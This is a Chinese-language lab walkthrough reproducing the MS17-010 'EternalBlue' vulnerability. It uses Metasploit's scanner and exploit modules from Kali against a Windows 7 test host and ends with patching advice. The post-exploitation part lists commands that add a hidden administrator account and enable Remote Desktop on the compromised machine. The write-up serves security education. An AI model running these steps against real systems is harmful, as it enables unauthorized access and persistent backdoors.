ms17-010漏洞复现

[漏洞复现] MS17-010 基于"永恒之蓝"实现Windows Getshell

  1. 漏洞复现环境
    Kali Linux 2017.03 + Windows 7 sp1
    攻击机:Kali Linux (ip:172.16.70.216)
    靶机:Windows 7 sp1 (ip:172.16.70.199)

  2. 实验流程
    ①登录Kali Linux,进入MSF框架,搜索ms17-010代码

msfconsole 
msf > search ms17_010 

在这里插入图片描述
ms17-010漏洞复现_第1张图片
这里可以得到两个工具,其中auxiliary/scanner/smb/smb_ms17_010是永恒之蓝扫描模块,exploit/windows/smb/ms17_010_eternalblue是永恒之蓝攻击代码,一般配合使用,前者先扫描,若显示有漏洞,再进行攻击测试。
②使用ms17-010扫描模块,对靶机Win7进行扫描
使用模块

msf > use auxiliary/scanner/smb/smb_ms17_010 
设置目标IP或网段 
msf auxiliary(smb_ms17_010) > set RHOSTS 172.16.70.199 
执行扫描 
msf auxiliary(smb_ms17_010) > run 

ms17-010漏洞复现_第2张图片
③使用ms17-010攻击模块,对靶机Win7进行攻击
使用模块

msf > use exploit/windows/smb/ms17_010_eternalblue 
查看可设置的选项 
msf exploit(ms17_010_eternalblue) > show options 
设置***目标ip 
msf exploit(ms17_010_eternalblue) > set RHOST 172.16.70.199 
执行攻击
msf exploit(ms17_010_eternalblue) > exploit 

ms17-010漏洞复现_第3张图片
ms17-010漏洞复现_第4张图片
ms17-010漏洞复现_第5张图片
此时Kali Linux通过MS17-010攻击代码,直接拿到Win7的Shell,之后便可以通过Shell对目标靶机进行控制。
输入以下代码可解决乱码问题:

在cmd中输入 CHCP 65001

④通过Shell对靶机Win7进行控制

创建用户名密码 blue/blue 
net user blue blue /add 
将用户blue添加入管理组 
net localgroup administrators blue /add 
开启远程桌面功能 
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f 
Kali远程桌面连接Win7 
rdesktop 172.16.70.199:3389

ms17-010漏洞复现_第6张图片
ms17-010漏洞复现_第7张图片
ms17-010漏洞复现_第8张图片
可以看到,最终Kali通过shell新建了用户,并通过远程桌面连接到目标靶机上。
当然,上面这是一个简单的演示,告诉大家这个漏洞很危险,真正的能做的事情更多,所以还是要多打补丁或安装安全软件

  1. 漏洞修复

①在线更新;开启Windows Update更新。
②打补丁;此漏洞对应的微软补丁地址:https://docs.microsoft.com/zh-cn/security-updates/Securitybulletins/2017/ms17-010

你可能感兴趣的:(系统漏洞,[漏洞复现],MS17-010,G)